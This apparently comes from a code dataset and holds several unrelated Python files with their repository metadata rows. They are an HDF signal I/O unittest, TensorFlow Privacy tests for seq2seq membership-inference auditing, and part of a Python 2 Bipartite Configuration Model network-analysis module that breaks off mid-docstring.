gv.code_returned = gv.return_codes['missing function argument']
print('Usage: generateRNG.py xmlfile')
else:
generate_rng_for(args[1])
if gv.code_returned == gv.return_codes['success']:
print('code successfully written')
else:
print('writing rng failed')
return gv.code_returned
if __name__ == '__main__':
main(sys.argv)
| lgpl-2.1 | -3,363,840,852,102,879,700 | 35.098039 | 78 | 0.67409 | false | 3.971953 | false | false | false |
bionet/ted.python | tests/test_signal_io.py | 1 | 1292 | #!/usr/bin/env python
"""
Test classes for writing and reading signals to and from HDF files.
"""
import unittest
import os
import numpy as np
import bionet.utils.signal_io as s
filename = 'test_signal_io_data.h5'
block_size = 10000
class SignalIOTestCase(unittest.TestCase):
def setUp(self):
'''Generate and save test data.'''
N = 1000000
self.u = np.random.rand(N)
w = s.WriteArray(filename)
w.write(self.u)
w.close()
def tearDown(self):
'''Clean up test file.'''
os.remove(filename)
def testReadOneBlock(self):
'''Test one-block read of saved data.'''
r = s.ReadArray(filename)
u_read = r.read()
r.close()
assert all(self.u==u_read),'read block does not match original block'
def testReadManyBlocks(self):
'''Test multi-block read of saved data.'''
r = s.ReadArray(filename)
temp = []
while True:
data_block = r.read(block_size)
if not len(data_block):
break
temp += data_block.tolist()
u_read = np.array(temp)
r.close()
assert all(self.u==u_read),'read block does not match original block'
if __name__ == "__main__":
unittest.main()
| bsd-3-clause | -5,436,309,697,830,017,000 | 22.071429 | 77 | 0.573529 | false | 3.734104 | true | false | false |
tensorflow/privacy | tensorflow_privacy/privacy/privacy_tests/membership_inference_attack/seq2seq_mia_test.py | 1 | 16296 | # Copyright 2020, The TensorFlow Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Tests for tensorflow_privacy.privacy.privacy_tests.membership_inference_attack.seq2seq_mia."""
from absl.testing import absltest
import numpy as np
from tensorflow_privacy.privacy.privacy_tests.membership_inference_attack.data_structures import AttackType
from tensorflow_privacy.privacy.privacy_tests.membership_inference_attack.data_structures import PrivacyReportMetadata
from tensorflow_privacy.privacy.privacy_tests.membership_inference_attack.seq2seq_mia import create_seq2seq_attacker_data
from tensorflow_privacy.privacy.privacy_tests.membership_inference_attack.seq2seq_mia import run_seq2seq_attack
from tensorflow_privacy.privacy.privacy_tests.membership_inference_attack.seq2seq_mia import Seq2SeqAttackInputData
class Seq2SeqAttackInputDataTest(absltest.TestCase):
def test_validator(self):
valid_logits_train = iter([np.array([]), np.array([])])
valid_logits_test = iter([np.array([]), np.array([])])
valid_labels_train = iter([np.array([]), np.array([])])
valid_labels_test = iter([np.array([]), np.array([])])
invalid_logits_train = []
invalid_logits_test = []
invalid_labels_train = []
invalid_labels_test = []
self.assertRaises(
ValueError,
Seq2SeqAttackInputData(logits_train=valid_logits_train).validate)
self.assertRaises(
ValueError,
Seq2SeqAttackInputData(labels_train=valid_labels_train).validate)
self.assertRaises(
ValueError,
Seq2SeqAttackInputData(logits_test=valid_logits_test).validate)
self.assertRaises(
ValueError,
Seq2SeqAttackInputData(labels_test=valid_labels_test).validate)
self.assertRaises(ValueError, Seq2SeqAttackInputData(vocab_size=0).validate)
self.assertRaises(ValueError, Seq2SeqAttackInputData(train_size=0).validate)
self.assertRaises(ValueError, Seq2SeqAttackInputData(test_size=0).validate)
self.assertRaises(ValueError, Seq2SeqAttackInputData().validate)
# Tests that both logits and labels must be set.
self.assertRaises(
ValueError,
Seq2SeqAttackInputData(
logits_train=valid_logits_train,
logits_test=valid_logits_test,
vocab_size=0,
train_size=0,
test_size=0).validate)
self.assertRaises(
ValueError,
Seq2SeqAttackInputData(
labels_train=valid_labels_train,
labels_test=valid_labels_test,
vocab_size=0,
train_size=0,
test_size=0).validate)
# Tests that vocab, train, test sizes must all be set.
self.assertRaises(
ValueError,
Seq2SeqAttackInputData(
logits_train=valid_logits_train,
logits_test=valid_logits_test,
labels_train=valid_labels_train,
labels_test=valid_labels_test).validate)
self.assertRaises(
ValueError,
Seq2SeqAttackInputData(
logits_train=invalid_logits_train,
logits_test=invalid_logits_test,
labels_train=invalid_labels_train,
labels_test=invalid_labels_test,
vocab_size=0,
train_size=0,
test_size=0).validate)
class Seq2SeqTrainedAttackerTest(absltest.TestCase):
def test_create_seq2seq_attacker_data_logits_and_labels(self):
attack_input = Seq2SeqAttackInputData(
logits_train=iter([
np.array([
np.array([[0.1, 0.1, 0.8], [0.7, 0.3, 0]], dtype=np.float32),
np.array([[0.4, 0.5, 0.1]], dtype=np.float32)
],
dtype=object),
np.array(
[np.array([[0.25, 0.6, 0.15], [1, 0, 0]], dtype=np.float32)],
dtype=object),
np.array([
np.array([[0.9, 0, 0.1], [0.25, 0.5, 0.25]], dtype=np.float32),
np.array([[0, 1, 0], [0.2, 0.1, 0.7]], dtype=np.float32)
],
dtype=object)
]),
logits_test=iter([
np.array([
np.array([[0.25, 0.4, 0.35], [0.2, 0.4, 0.4]], dtype=np.float32)
],
dtype=object),
np.array([
np.array([[0.3, 0.3, 0.4], [0.4, 0.4, 0.2]], dtype=np.float32),
np.array([[0.3, 0.35, 0.35]], dtype=np.float32)
],
dtype=object)
]),
labels_train=iter([
np.array([
np.array([2, 0], dtype=np.float32),
np.array([1], dtype=np.float32)
],
dtype=object),
np.array([np.array([1, 0], dtype=np.float32)], dtype=object),
np.array([
np.array([0, 1], dtype=np.float32),
np.array([1, 2], dtype=np.float32)
],
dtype=object)
]),
labels_test=iter([
np.array([np.array([2, 1], dtype=np.float32)]),
np.array([
np.array([2, 0], dtype=np.float32),
np.array([1], dtype=np.float32)
],
dtype=object)
]),
vocab_size=3,
train_size=3,
test_size=2)
privacy_report_metadata = PrivacyReportMetadata()
attacker_data = create_seq2seq_attacker_data(
attack_input_data=attack_input,
test_fraction=0.25,
balance=False,
privacy_report_metadata=privacy_report_metadata)
self.assertLen(attacker_data.features_train, 3)
self.assertLen(attacker_data.features_test, 2)
for _, feature in enumerate(attacker_data.features_train):
self.assertLen(feature, 1) # each feature has one average rank
# Tests that fields of PrivacyReportMetadata are populated.
self.assertIsNotNone(privacy_report_metadata.loss_train)
self.assertIsNotNone(privacy_report_metadata.loss_test)
self.assertIsNotNone(privacy_report_metadata.accuracy_train)
self.assertIsNotNone(privacy_report_metadata.accuracy_test)
def test_balanced_create_seq2seq_attacker_data_logits_and_labels(self):
attack_input = Seq2SeqAttackInputData(
logits_train=iter([
np.array([
np.array([[0.1, 0.1, 0.8], [0.7, 0.3, 0]], dtype=np.float32),
np.array([[0.4, 0.5, 0.1]], dtype=np.float32)
],
dtype=object),
np.array(
[np.array([[0.25, 0.6, 0.15], [1, 0, 0]], dtype=np.float32)],
dtype=object),
np.array([
np.array([[0.9, 0, 0.1], [0.25, 0.5, 0.25]], dtype=np.float32),
np.array([[0, 1, 0], [0.2, 0.1, 0.7]], dtype=np.float32)
],
dtype=object)
]),
logits_test=iter([
np.array([
np.array([[0.25, 0.4, 0.35], [0.2, 0.4, 0.4]], dtype=np.float32)
],
dtype=object),
np.array([
np.array([[0.3, 0.3, 0.4], [0.4, 0.4, 0.2]], dtype=np.float32),
np.array([[0.3, 0.35, 0.35]], dtype=np.float32)
],
dtype=object),
np.array([
np.array([[0.25, 0.4, 0.35], [0.2, 0.4, 0.4]], dtype=np.float32)
],
dtype=object)
]),
labels_train=iter([
np.array([
np.array([2, 0], dtype=np.float32),
np.array([1], dtype=np.float32)
],
dtype=object),
np.array([np.array([1, 0], dtype=np.float32)], dtype=object),
np.array([
np.array([0, 1], dtype=np.float32),
np.array([1, 2], dtype=np.float32)
],
dtype=object)
]),
labels_test=iter([
np.array([np.array([2, 1], dtype=np.float32)]),
np.array([
np.array([2, 0], dtype=np.float32),
np.array([1], dtype=np.float32)
],
dtype=object),
np.array([np.array([2, 1], dtype=np.float32)])
]),
vocab_size=3,
train_size=3,
test_size=3)
privacy_report_metadata = PrivacyReportMetadata()
attacker_data = create_seq2seq_attacker_data(
attack_input_data=attack_input,
test_fraction=0.33,
balance=True,
privacy_report_metadata=privacy_report_metadata)
self.assertLen(attacker_data.features_train, 4)
self.assertLen(attacker_data.features_test, 2)
for _, feature in enumerate(attacker_data.features_train):
self.assertLen(feature, 1) # each feature has one average rank
# Tests that fields of PrivacyReportMetadata are populated.
self.assertIsNotNone(privacy_report_metadata.loss_train)
self.assertIsNotNone(privacy_report_metadata.loss_test)
self.assertIsNotNone(privacy_report_metadata.accuracy_train)
self.assertIsNotNone(privacy_report_metadata.accuracy_test)
def _get_batch_logits_and_labels(num_sequences, max_tokens_in_sequence,
vocab_size):
num_tokens_in_sequence = np.random.choice(max_tokens_in_sequence,
num_sequences) + 1
batch_logits, batch_labels = [], []
for num_tokens in num_tokens_in_sequence:
logits, labels = _get_sequence_logits_and_labels(num_tokens, vocab_size)
batch_logits.append(logits)
batch_labels.append(labels)
return np.array(
batch_logits, dtype=object), np.array(
batch_labels, dtype=object)
def _get_sequence_logits_and_labels(num_tokens, vocab_size):
sequence_logits = []
for _ in range(num_tokens):
token_logits = np.random.random(vocab_size)
token_logits /= token_logits.sum()
sequence_logits.append(token_logits)
sequence_labels = np.random.choice(vocab_size, num_tokens)
return np.array(
sequence_logits, dtype=np.float32), np.array(
sequence_labels, dtype=np.float32)
def get_seq2seq_test_input(n_train,
n_test,
max_seq_in_batch,
max_tokens_in_sequence,
vocab_size,
seed=None):
"""Returns example inputs for attacks on seq2seq models."""
if seed is not None:
np.random.seed(seed=seed)
logits_train, labels_train = [], []
for _ in range(n_train):
num_sequences = np.random.choice(max_seq_in_batch, 1)[0] + 1
batch_logits, batch_labels = _get_batch_logits_and_labels(
num_sequences, max_tokens_in_sequence, vocab_size)
logits_train.append(batch_logits)
labels_train.append(batch_labels)
logits_test, labels_test = [], []
for _ in range(n_test):
num_sequences = np.random.choice(max_seq_in_batch, 1)[0] + 1
batch_logits, batch_labels = _get_batch_logits_and_labels(
num_sequences, max_tokens_in_sequence, vocab_size)
logits_test.append(batch_logits)
labels_test.append(batch_labels)
return Seq2SeqAttackInputData(
logits_train=iter(logits_train),
logits_test=iter(logits_test),
labels_train=iter(labels_train),
labels_test=iter(labels_test),
vocab_size=vocab_size,
train_size=n_train,
test_size=n_test)
class RunSeq2SeqAttackTest(absltest.TestCase):
def test_run_seq2seq_attack_size(self):
result = run_seq2seq_attack(
get_seq2seq_test_input(
n_train=10,
n_test=5,
max_seq_in_batch=3,
max_tokens_in_sequence=5,
vocab_size=2))
self.assertLen(result.single_attack_results, 1)
def test_run_seq2seq_attack_trained_sets_attack_type(self):
result = run_seq2seq_attack(
get_seq2seq_test_input(
n_train=10,
n_test=5,
max_seq_in_batch=3,
max_tokens_in_sequence=5,
vocab_size=2))
seq2seq_result = list(result.single_attack_results)[0]
self.assertEqual(seq2seq_result.attack_type, AttackType.LOGISTIC_REGRESSION)
def test_run_seq2seq_attack_calculates_correct_auc(self):
result = run_seq2seq_attack(
get_seq2seq_test_input(
n_train=20,
n_test=10,
max_seq_in_batch=3,
max_tokens_in_sequence=5,
vocab_size=3,
seed=12345),
balance_attacker_training=False)
seq2seq_result = list(result.single_attack_results)[0]
np.testing.assert_almost_equal(
seq2seq_result.roc_curve.get_auc(), 0.63, decimal=2)
def test_run_seq2seq_attack_calculates_correct_metadata(self):
attack_input = Seq2SeqAttackInputData(
logits_train=iter([
np.array([
np.array([[0.1, 0.1, 0.8], [0.7, 0.3, 0]], dtype=np.float32),
np.array([[0.4, 0.5, 0.1]], dtype=np.float32)
],
dtype=object),
np.array(
[np.array([[0.25, 0.6, 0.15], [1, 0, 0]], dtype=np.float32)],
dtype=object),
np.array([
np.array([[0.9, 0, 0.1], [0.25, 0.5, 0.25]], dtype=np.float32),
np.array([[0, 1, 0], [0.2, 0.1, 0.7]], dtype=np.float32)
],
dtype=object),
np.array([
np.array([[0.9, 0, 0.1], [0.25, 0.5, 0.25]], dtype=np.float32),
np.array([[0, 1, 0], [0.2, 0.1, 0.7]], dtype=np.float32)
],
dtype=object)
]),
logits_test=iter([
np.array([
np.array([[0.25, 0.4, 0.35], [0.2, 0.4, 0.4]], dtype=np.float32)
],
dtype=object),
np.array([
np.array([[0.3, 0.3, 0.4], [0.4, 0.4, 0.2]], dtype=np.float32),
np.array([[0.3, 0.35, 0.35]], dtype=np.float32)
],
dtype=object),
np.array([
np.array([[0.25, 0.4, 0.35], [0.2, 0.4, 0.4]], dtype=np.float32)
],
dtype=object),
np.array([
np.array([[0.25, 0.4, 0.35], [0.2, 0.4, 0.4]], dtype=np.float32)
],
dtype=object)
]),
labels_train=iter([
np.array([
np.array([2, 0], dtype=np.float32),
np.array([1], dtype=np.float32)
],
dtype=object),
np.array([np.array([1, 0], dtype=np.float32)], dtype=object),
np.array([
np.array([0, 1], dtype=np.float32),
np.array([1, 2], dtype=np.float32)
],
dtype=object),
np.array([
np.array([0, 0], dtype=np.float32),
np.array([0, 1], dtype=np.float32)
],
dtype=object)
]),
labels_test=iter([
np.array([np.array([2, 1], dtype=np.float32)]),
np.array([
np.array([2, 0], dtype=np.float32),
np.array([1], dtype=np.float32)
],
dtype=object),
np.array([np.array([2, 1], dtype=np.float32)]),
np.array([np.array([2, 1], dtype=np.float32)]),
]),
vocab_size=3,
train_size=4,
test_size=4)
result = run_seq2seq_attack(attack_input, balance_attacker_training=False)
metadata = result.privacy_report_metadata
np.testing.assert_almost_equal(metadata.loss_train, 0.91, decimal=2)
np.testing.assert_almost_equal(metadata.loss_test, 1.58, decimal=2)
np.testing.assert_almost_equal(metadata.accuracy_train, 0.77, decimal=2)
np.testing.assert_almost_equal(metadata.accuracy_test, 0.67, decimal=2)
if __name__ == '__main__':
absltest.main()
| apache-2.0 | 8,734,620,172,058,187,000 | 37.343529 | 121 | 0.560506 | false | 3.476851 | true | false | false |
tsakim/bicm | src/bicm.py | 1 | 41931 | # -*- coding: utf-8 -*-
"""
Created on Tue Dec 1 08:04:28 2015
Module:
bicm - Bipartite Configuration Model
Author:
Mika Straka
Description:
Implementation of the Bipartite Configuration Model (BiCM) for binary
undirected bipartite networks [Saracco2015]_.
Given the biadjacency matrix of a bipartite graph in the form of a binary
array as input, the module allows the user to calculate the biadjacency
matrix of the ensemble average graph :math:`<G>^*` of the BiCM null model.
The matrix entries correspond to the link probabilities :math:`<G>^*_{rc} =
p_{rc}` between nodes of the two distinct bipartite node sets.
Subsequently, one can calculate the p-values of the node similarities for
nodes in the same bipartite layer [Saracco2017]_.
Usage:
Be ``mat`` a two-dimensional binary NumPy array. The nodes of the two
bipartite layers are ordered along the rows and columns, respectively. In
the algorithm, the two layers are identified by the boolean values ``True``
for the **row-nodes** and ``False`` for the **column-nodes**.
Import the module and initialize the Bipartite Configuration Model::
>>> from src.bicm import BiCM
>>> cm = BiCM(bin_mat=mat)
To create the biadjacency matrix of the BiCM, use::
>>> cm.make_bicm()
.. note::
Note that ``make_bicm`` outputs a *status message* in the console, which
informs the user whether the underlying numerical solver has converged
to a solution.
The function is based on the ``scipy.optimize.root`` routine of the
`SciPy package <http://scipy.org>`_ to solve a log-likelihood
maximization problem and uses thus the same arguments (except for
*fun* and *args*, which are specified in our problem).
This means that the user has full control over the selection of a
solver, the initial conditions, tolerance, etc.
As a matter of fact, it may happen that the default function call
``make_bicm()`` results in an unsuccessful solver, which requires
adjusting the function arguments.
In this case, please refer the description of the functions
:func:`BiCM.make_bicm` and :func:`BiCM.solve_equations`, and the
`scipy.optimize.root documentation
<https://docs.scipy.org/doc/scipy-0.19.0/reference/generated/
scipy.optimize.root.html>`_.
The biadjacency matrix of the BiCM null model can be saved in *<filename>*::
>>> cm.save_biadjacency(filename=<filename>, delim='\t')
By default, the file is saved in a human-readable ``.csv`` format with tab
delimiters, which can be changed using the keyword ``delim``. The
information can also be saved as a binary NumPy file ``.npy`` by using::
>>> cm.save_biadjacency(filename=<filename>, binary=True)
If the file is not binary, it should end with ``.csv``. If it is binary
instead, NumPy automatically attaches the ending ``.npy``.
In order to analyze the similarity of the **row-nodes** and to save
the p-values of the corresponding :math:`\\Lambda`-motifs (i.e. of the
number of shared neighbors [Saracco2017]_), use::
>>> cm.lambda_motifs(True, filename=<filename>)
For the **column-nodes**, use::
>>> cm.lambda_motifs(False, filename=<filename>)
By default, the resulting p-values are saved as binary NumPy file to reduce
the required disk space, and the format suffix ``.npy`` is appended. If the
file should be saved in a human-readable ``.csv`` format, use::
>>> cm.lambda_motifs(True, filename=<filename>, delim='\\t', \
binary=False)
or analogously::
>>> cm.lambda_motifs(False, filename=<filename>, delim='\\t', \
binary=False)
.. note::
The p-values are saved as a one-dimensional array with index
:math:`k \\in \\left[0, \\ldots, \\binom{N}{2} - 1\\right]` for a
bipartite layer of :math:`N` nodes. The indices ``(i, j)`` of the
nodes corresponding to entry ``k`` in the array can be reconstructed
using the method :func:`BiCM.flat2_triumat_idx`. The number of nodes
``N`` can be recovered from the length of the array with
:func:`BiCM.flat2_triumat_dim`.
Subsequently, the p-values can be used to perform a multiple hypotheses
testing of the node similarities and to obtain statistically validated
monopartite projections [Saracco2017]_. The p-values are calculated in
parallel by default, see :ref:`parallel` for details.
.. note::
Since the calculation of the p-values is computationally demanding, the
``bicm`` module uses the Python `multiprocessing
<https://docs.python.org/2/library/multiprocessing.html>`_ package by
default for this purpose. The number of parallel processes depends on
the number of CPUs of the work station (see variable ``num_procs`` in
the method :func:`BiCM.get_pvalues_q`).
If the calculation should **not** be performed in parallel, use::
>>> cm.lambda_motifs(<bool>, parallel=False)
instead of::
>>> cm.lambda_motifs(<bool>)
References:
.. [Saracco2015] `F. Saracco, R. Di Clemente, A. Gabrielli, T. Squartini,
Randomizing bipartite networks: the case of the World Trade Web,
Scientific Reports 5, 10595 (2015)
<http://www.nature.com/articles/srep10595>`_
.. [Saracco2017] `F. Saracco, M. J. Straka, R. Di Clemente, A. Gabrielli,
G. Caldarelli, and T. Squartini,
Inferring monopartite projections of bipartite networks: an entropy-based
approach, New J. Phys. 19, 053022 (2017)
<http://stacks.iop.org/1367-2630/19/i=5/a=053022>`_
"""
import ctypes
import multiprocessing
import scipy.optimize as opt
import numpy as np
from poibin.poibin import PoiBin
class BiCM(object):
"""Bipartite Configuration Model for undirected binary bipartite networks.
This class implements the Bipartite Configuration Model (BiCM), which can
be used as a null model for the analysis of undirected and binary bipartite
networks. The class provides methods for calculating the biadjacency matrix
of the null model and for quantifying node similarities in terms of
p-values.
"""
def __init__(self, bin_mat):
"""Initialize the parameters of the BiCM.
:param bin_mat: binary input matrix describing the biadjacency matrix
of a bipartite graph with the nodes of one layer along the rows
and the nodes of the other layer along the columns.
:type bin_mat: numpy.array
"""
self.bin_mat = np.array(bin_mat, dtype=np.int64)
self.check_input_matrix_is_binary()
[self.num_rows, self.num_columns] = self.bin_mat.shape
self.dseq = self.set_degree_seq()
self.dim = self.dseq.size
self.sol = None # solution of the equation system
self.adj_matrix = None # biadjacency matrix of the null model
self.input_queue = None # queue for parallel processing
self.output_queue = None # queue for parallel processing
def check_input_matrix_is_binary(self):
"""Check that the input matrix is binary, i.e. entries are 0 or 1.
:raise AssertionError: raise an error if the input matrix is not
binary
"""
assert np.all(np.logical_or(self.bin_mat == 0, self.bin_mat == 1)), \
"Input matrix is not binary."
def set_degree_seq(self):
"""Return the node degree sequence of the input matrix.
:returns: node degree sequence [degrees row-nodes, degrees column-nodes]
:rtype: numpy.array
:raise AssertionError: raise an error if the length of the returned
degree sequence does not correspond to the total number of nodes
"""
dseq = np.empty(self.num_rows + self.num_columns)
dseq[self.num_rows:] = np.squeeze(np.sum(self.bin_mat, axis=0))
dseq[:self.num_rows] = np.squeeze(np.sum(self.bin_mat, axis=1))
assert dseq.size == (self.num_rows + self.num_columns)
return dseq
def make_bicm(self, x0=None, method='hybr', jac=None, tol=None,
callback=None, options=None):
"""Create the biadjacency matrix of the BiCM null model.
Solve the log-likelihood maximization problem to obtain the BiCM
null model which respects constraints on the degree sequence of the
input matrix.
The problem is solved using ``scipy``'s root function with the solver
defined by ``method``. The status of the solver after running
``scipy.root``and the difference between the network and BiCM degrees
are printed in the console.
The default solver is the modified Powell method ``hybr``. Least-squares
can be chosen with ``method='lm'`` for the Levenberg-Marquardt approach.
Depending on the solver, keyword arguments ``kwargs`` can be passed to
the solver. Please refer to the `scipy.optimize.root documentation
<https://docs.scipy.org/doc/scipy-0.19.0/reference/generated/
scipy.optimize.root.html>`_ for detailed descriptions.
.. note::
It can happen that the solver ``method`` used by ``scipy.root``
does not converge to a solution.
In this case, please try another ``method`` or different initial
conditions and refer to the `scipy.optimize.root documentation
<https://docs.scipy.org/doc/scipy-0.19.0/reference/generated/
scipy.optimize.root.html>`_.
:param x0: initial guesses for the solutions. The first entries are the
initial guesses for the row-nodes, followed by the initial guesses
for the column-nodes.
:type x0: 1d numpy.array, optional
:param method: type of solver, default is ‘hybr’. For other
solvers, see the `scipy.optimize.root documentation
<https://docs.scipy.org/doc/
scipy-0.19.0/reference/generated/scipy.optimize.root.html>`_.
:type method: str, optional
:param jac: Jacobian of the system
:type jac: bool or callable, optional
:param tol: tolerance for termination. For detailed control, use
solver-specific options.
:type tol: float, optional
:param callback: optional callback function to be called at
every iteration as ``callback(self.equations, x)``,
see ``scipy.root`` documentation
:type callback: function, optional
:param options: a dictionary of solver options, e.g. ``xtol`` or
``maxiter``, see scipy.root documentation
:type options: dict, optional
:param kwargs: solver-specific options, please refer to the SciPy
documentation
:raise ValueError: raise an error if not enough initial conditions
are provided
"""
self.sol = self.solve_equations(x0=x0, method=method, jac=jac, tol=tol,
callback=callback, options=options)
# create BiCM biadjacency matrix:
self.adj_matrix = self.get_biadjacency_matrix(self.sol.x)
# self.print_max_degree_differences()
# assert self.test_average_degrees(eps=1e-2)
# ------------------------------------------------------------------------------
# Solve coupled nonlinear equations and get BiCM biadjacency matrix
# ------------------------------------------------------------------------------
def solve_equations(self, x0=None, method='hybr', jac=None, tol=None,
callback=None, options=None):
"""Solve the system of equations of the maximum log-likelihood problem.
The system of equations is solved using ``scipy``'s root function with
the solver defined by ``method``. The solutions correspond to the
Lagrange multipliers
.. math::
x_i = \exp(-\\theta_i).
Depending on the solver, keyword arguments ``kwargs`` can be passed to
the solver. Please refer to the `scipy.optimize.root documentation
<https://docs.scipy.org/doc/scipy-0.19.0/reference/generated/
scipy.optimize.root.html>`_ for detailed descriptions.
The default solver is the modified Powell method ``hybr``. Least-squares
can be chosen with ``method='lm'`` for the Levenberg-Marquardt approach.
.. note::
It can happen that the solver ``method`` used by ``scipy.root``
does not converge to a solution.
In this case, please try another ``method`` or different initial
conditions and refer to the `scipy.optimize.root documentation
<https://docs.scipy.org/doc/scipy-0.19.0/reference/generated/
scipy.optimize.root.html>`_.
:param x0: initial guesses for the solutions. The first entries are the
initial guesses for the row-nodes, followed by the initial guesses
for the column-nodes.
:type x0: 1d numpy.array, optional
:param method: type of solver, default is ‘hybr’. For other
solvers, see the `scipy.optimize.root documentation
<https://docs.scipy.org/doc/
scipy-0.19.0/reference/generated/scipy.optimize.root.html>`_.
:type method: str, optional
:param jac: Jacobian of the system
:type jac: bool or callable, optional
:param tol: tolerance for termination. For detailed control, use
solver-specific options.
:type tol: float, optional
:param callback: optional callback function to be called at
every iteration as ``callback(self.equations, x)``,
see ``scipy.root`` documentation
:type callback: function, optional
:param options: a dictionary of solver options, e.g. ``xtol`` or
``maxiter``, see scipy.root documentation
:type options: dict, optional
:param kwargs: solver-specific options, please refer to the SciPy
documentation
:returns: solution of the equation system
:rtype: scipy.optimize.OptimizeResult
:raise ValueError: raise an error if not enough initial conditions
are provided
"""
# use Jacobian if the hybr solver is chosen
if method is 'hybr':
jac = self.jacobian
# set initial conditions
if x0 is None:
x0 = self.dseq / np.sqrt(np.sum(self.dseq))
else:
if not len(x0) == self.dim:
msg = "One initial condition for each parameter is required."
raise ValueError(msg)
# solve equation system
sol = opt.root(fun=self.equations, x0=x0, method=method, jac=jac,
tol=tol, options=options, callback=callback)
# check whether system has been solved successfully
print "Solver successful:", sol.success
print sol.message
if not sol.success:
errmsg = "Try different initial conditions and/or a" + \
"different solver, see documentation at " + \
"https://docs.scipy.org/doc/scipy-0.19.0/reference/" + \
"generated/scipy.optimize.root.html"
print errmsg
return sol
def equations(self, xx):
"""Return the equations of the log-likelihood maximization problem.
Note that the equations for the row-nodes depend only on the
column-nodes and vice versa, see [Saracco2015]_.
:param xx: Lagrange multipliers which have to be solved
:type xx: numpy.array
:returns: equations to be solved (:math:`f(x) = 0`)
:rtype: numpy.array
"""
eq = -self.dseq
for i in xrange(0, self.num_rows):
for j in xrange(self.num_rows, self.dim):
dum = xx[i] * xx[j] / (1. + xx[i] * xx[j])
eq[i] += dum
eq[j] += dum
return eq
def jacobian(self, xx):
"""Return a NumPy array with the Jacobian of the equation system.
:param xx: Lagrange multipliers which have to be solved
:type xx: numpy.array
:returns: Jacobian
:rtype: numpy.array
"""
jac = np.zeros((self.dim, self.dim))
for i in xrange(0, self.num_rows):
# df_c / df_c' = 0 for all c' != c
for j in xrange(self.num_rows, self.dim):
# df_c / dx_c != 0
xxi = xx[i] / (1.0 + xx[i] * xx[j]) ** 2
xxj = xx[j] / (1.0 + xx[i] * xx[j]) ** 2
jac[i, i] += xxj
jac[i, j] = xxi
jac[j, i] = xxj
jac[j, j] += xxi
return jac
def get_biadjacency_matrix(self, xx):
""" Calculate the biadjacency matrix of the null model.
The biadjacency matrix describes the BiCM null model, i.e. the optimal
average graph :math:`<G>^*` with the average link probabilities
:math:`<G>^*_{rc} = p_{rc}` ,
:math:`p_{rc} = \\frac{x_r \\cdot x_c}{1 + x_r\\cdot x_c}.`
:math:`x` are the solutions of the equation system which has to be
solved for the null model.
Note that :math:`r` and :math:`c` are taken from opposite bipartite
node sets, thus :math:`r \\neq c`.
:param xx: solutions of the equation system (Lagrange multipliers)
:type xx: numpy.array
:returns: biadjacency matrix of the null model
:rtype: numpy.array
:raises ValueError: raise an error if :math:`p_{rc} < 0` or
:math:`p_{rc} > 1` for any :math:`r, c`
"""
mat = np.empty((self.num_rows, self.num_columns))
xp = xx[range(self.num_rows, self.dim)]
for i in xrange(self.num_rows):
mat[i, ] = xx[i] * xp / (1 + xx[i] * xp)
# account for machine precision:
mat += np.finfo(np.float).eps
if np.any(mat < 0):
errmsg = 'Error in get_adjacency_matrix: probabilities < 0 in ' \
+ str(np.where(mat < 0))
raise ValueError(errmsg)
elif np.any(mat > (1. + np.finfo(np.float).eps)):
errmsg = 'Error in get_adjacency_matrix: probabilities > 1 in' \
+ str(np.where(mat > 1))
raise ValueError(errmsg)
assert mat.shape == self.bin_mat.shape, \
"Biadjacency matrix has wrong dimensions."
return mat
# ------------------------------------------------------------------------------
# Test correctness of results:
# ------------------------------------------------------------------------------
def print_max_degree_differences(self):
"""Print the maximal differences between input network and BiCM degrees.
Check that the degree sequence of the solved BiCM null model graph
corresponds to the degree sequence of the input graph.
"""
ave_deg_columns =np.sum(self.adj_matrix, axis=0)
ave_deg_rows = np.sum(self.adj_matrix, axis=1)
print "Maximal degree differences between data and BiCM:"
print "Columns:", np.abs(np.max(
self.dseq[self.num_rows:] - ave_deg_columns))
print "Rows:", np.abs(np.max(
self.dseq[:self.num_rows] - ave_deg_rows))
def test_average_degrees(self, eps=1e-2):
"""Test the constraints on the node degrees.
Check that the degree sequence of the solved BiCM null model graph
corresponds to the degree sequence of the input graph.
:param eps: maximum difference between degrees of the real network
and the BiCM
:type eps: float
"""
ave_deg_columns = np.squeeze(np.sum(self.adj_matrix, axis=0))
ave_deg_rows = np.squeeze(np.sum(self.adj_matrix, axis=1))
c_derr = np.where(np.logical_or(
# average degree too small:
ave_deg_rows + eps < self.dseq[:self.num_rows],
# average degree too large:
ave_deg_rows - eps > self.dseq[:self.num_rows]))
p_derr = np.where(np.logical_or(
ave_deg_columns + eps < self.dseq[self.num_rows:],
ave_deg_columns - eps > self.dseq[self.num_rows:]))
# Check row-nodes degrees:
if not np.array_equiv(c_derr, np.array([])):
print '...inaccurate row-nodes degrees:'
for i in c_derr[0]:
print 'Row-node ', i, ':',
print 'input:', self.dseq[i], 'average:', ave_deg_rows[i]
return False
# Check column-nodes degrees:
if not np.array_equiv(p_derr, np.array([])):
print '...inaccurate column-nodes degrees:'
for i in c_derr[0]:
print 'Column-node ', i, ':',
print 'input:', self.dseq[i + self.num_rows], \
'average:', ave_deg_columns[i]
return False
return True
# ------------------------------------------------------------------------------
# Lambda motifs
# ------------------------------------------------------------------------------
def lambda_motifs(self, bip_set, parallel=True, filename=None,
delim='\t', binary=True, num_chunks=4):
"""Calculate and save the p-values of the :math:`\\Lambda`-motifs.
For each node couple in the bipartite layer specified by ``bip_set``,
calculate the p-values of the corresponding :math:`\\Lambda`-motifs
according to the link probabilities in the biadjacency matrix of the
BiCM null model.
The results can be saved either as a binary ``.npy`` or a
human-readable ``.csv`` file, depending on ``binary``.
.. note::
* The total number of p-values that are calculated is split into
``num_chunks`` chunks, which are processed sequentially in order
to avoid memory allocation errors. Note that a larger value of
``num_chunks`` will lead to less memory occupation, but comes at
the cost of slower processing speed.
* The output consists of a one-dimensional array of p-values. If
the bipartite layer ``bip_set`` contains ``n`` nodes, this means
that the array will contain :math:`\\binom{n}{2}` entries. The
indices ``(i, j)`` of the nodes corresponding to entry ``k`` in
the array can be reconstructed using the method
:func:`BiCM.flat2_triumat_idx`. The number of nodes ``n``
can be recovered from the length of the array with
:func:`BiCM.flat2_triumat_dim`
* If ``binary == False``, the ``filename`` should end with
